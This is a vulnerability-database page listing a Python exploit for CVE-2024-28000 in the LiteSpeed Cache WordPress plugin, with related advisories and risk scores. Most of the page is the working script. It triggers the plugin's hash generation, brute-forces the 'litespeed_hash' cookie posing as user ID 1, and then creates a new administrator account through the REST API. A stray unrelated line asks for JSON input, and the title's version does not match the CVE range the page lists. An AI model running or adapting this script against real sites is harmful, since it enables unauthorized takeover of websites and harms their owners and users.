📄 Litespeed Cache 6.4.0.1 Privilege Escalation

🗓️ 12 Jun 2025 00:00:00Reported by Milad KarimiType

packetstorm🔗 packetstorm.news👁 147 Views

Please provide the input as a JSON array of objects with id and description fields.

Reporter	Title	Published	Views	Family All 28
GithubExploit	Exploit for Incorrect Privilege Assignment in Litespeedtech Litespeed_Cache	25 Aug 202416:57	–	githubexploit
GithubExploit	Exploit for Incorrect Privilege Assignment in Litespeedtech Litespeed_Cache	27 Aug 202407:20	–	githubexploit
GithubExploit	Exploit for Incorrect Privilege Assignment in Litespeedtech Litespeed_Cache	10 Sep 202408:16	–	githubexploit
GithubExploit	Exploit for Incorrect Privilege Assignment in Litespeedtech Litespeed_Cache	24 Aug 202405:12	–	githubexploit
GithubExploit	Exploit for Incorrect Privilege Assignment in Litespeedtech Litespeed_Cache	9 Sep 202406:19	–	githubexploit
BDU FSTEC	The vulnerability of the LiteSpeed Cache plugin for WordPress (LSCWP), a content management system for WordPress websites, relates to improper privilege assignment, allowing attackers to escalate their privileges.	16 Sep 202400:00	–	bdu_fstec
Circl	CVE-2024-28000	21 Aug 202416:34	–	circl
CNNVD	WordPress Plugin LiteSpeed Cache 安全漏洞	21 Aug 202400:00	–	cnnvd
CVE	CVE-2024-28000	21 Aug 202413:53	–	cve
Cvelist	CVE-2024-28000 WordPress LiteSpeed Cache plugin <= 6.3.0.1 - Unauthenticated Privilege Escalation vulnerability	21 Aug 202413:53	–	cvelist

# Exploit Title: Litespeed Cache 6.4.0.1 - Privilege Escalation
    # Date: 2025-06-10
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: [email protected]
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # Country: United Kingdom
    # CVE : CVE-2024-28000
    
    
    import requests
    import random
    import string
    import concurrent.futures
    
    # Configuration
    target_url = 'http://example.com'
    rest_api_endpoint = '/wp-json/wp/v2/users'
    ajax_endpoint = '/wp-admin/admin-ajax.php'
    admin_user_id = '1'
    num_hash_attempts = 1000000
    num_workers = 10
    new_username = 'newadminuser' # Replace with desired username
    new_user_password = 'NewAdminPassword123!' # Replace with a secure password
    
    def mt_srand(seed=None):
        """
        Mimics PHP's mt_srand function by setting the seed for random number
    generation.
        """
        random.seed(seed)
    
    def mt_rand(min_value=0, max_value=2**32 - 1):
        """
        Mimics PHP's mt_rand function by generating a random number within the
    specified range.
        """
        return random.randint(min_value, max_value)
    
    def generate_random_string(length=6):
        """
        Generates a random string based on the output of mt_rand.
        """
        chars = string.ascii_letters + string.digits
        return ''.join(random.choices(chars, k=length))
    
    def trigger_hash_generation():
        payload = {
            'action': 'async_litespeed',
            'litespeed_type': 'crawler'
        }
        try:
            response = requests.post(f'{target_url}{ajax_endpoint}',
    data=payload)
            if response.status_code == 200:
                print('[INFO] Triggered hash generation.')
            else:
                print(f'[ERROR] Failed to trigger hash generation - Status
    code: {response.status_code}')
        except requests.RequestException as e:
            print(f'[ERROR] AJAX request failed: {e}')
    
    def attempt_hash(hash_value):
        cookies = {
            'litespeed_hash': hash_value,
            'litespeed_role': admin_user_id
        }
        try:
            response = requests.post(f'{target_url}{rest_api_endpoint}',
    cookies=cookies)
            return response, cookies
        except requests.RequestException as e:
            print(f'[ERROR] Request failed: {e}')
            return None, None
    
    def create_admin_user(cookies):
        user_data = {
            'username': new_username,
            'password': new_user_password,
            'email': f'{new_username}@example.com',
            'roles': ['administrator']
        }
        try:
            response = requests.post(f'{target_url}{rest_api_endpoint}',
    cookies=cookies, json=user_data)
            if response.status_code == 201:
                print(f'[SUCCESS] New admin user "{new_username}" created
    successfully!')
            else:
                print(f'[ERROR] Failed to create admin user - Status code:
    {response.status_code} - Response: {response.text}')
        except requests.RequestException as e:
            print(f'[ERROR] User creation request failed: {e}')
    
    def worker():
        for _ in range(num_hash_attempts // num_workers):
            random_string = generate_random_string()
            print(f'[DEBUG] Trying hash: {random_string}')
    
            response, cookies = attempt_hash(random_string)
    
            if response is None:
                continue
    
            print(f'[DEBUG] Response status code: {response.status_code}')
            print(f'[DEBUG] Response content: {response.text}')
    
            if response.status_code == 201:
                print(f'[SUCCESS] Valid hash found: {random_string}')
                create_admin_user(cookies)
                return
            elif response.status_code == 401:
                print(f'[FAIL] Invalid hash: {random_string}')
            else:
                print(f'[ERROR] Unexpected response for hash: {random_string} -
    Status code: {response.status_code}')
    
    def main():
        # Seeding the random number generator (mimicking mt_srand)
        mt_srand()
    
        trigger_hash_generation()
    
        with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as
    executor:
            futures = [executor.submit(worker) for _ in range(num_workers)]
            concurrent.futures.wait(futures)
    
    if __name__ == '__main__':
        main()

12 Jun 2025 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 3.19.8

EPSS0.92063

SSVC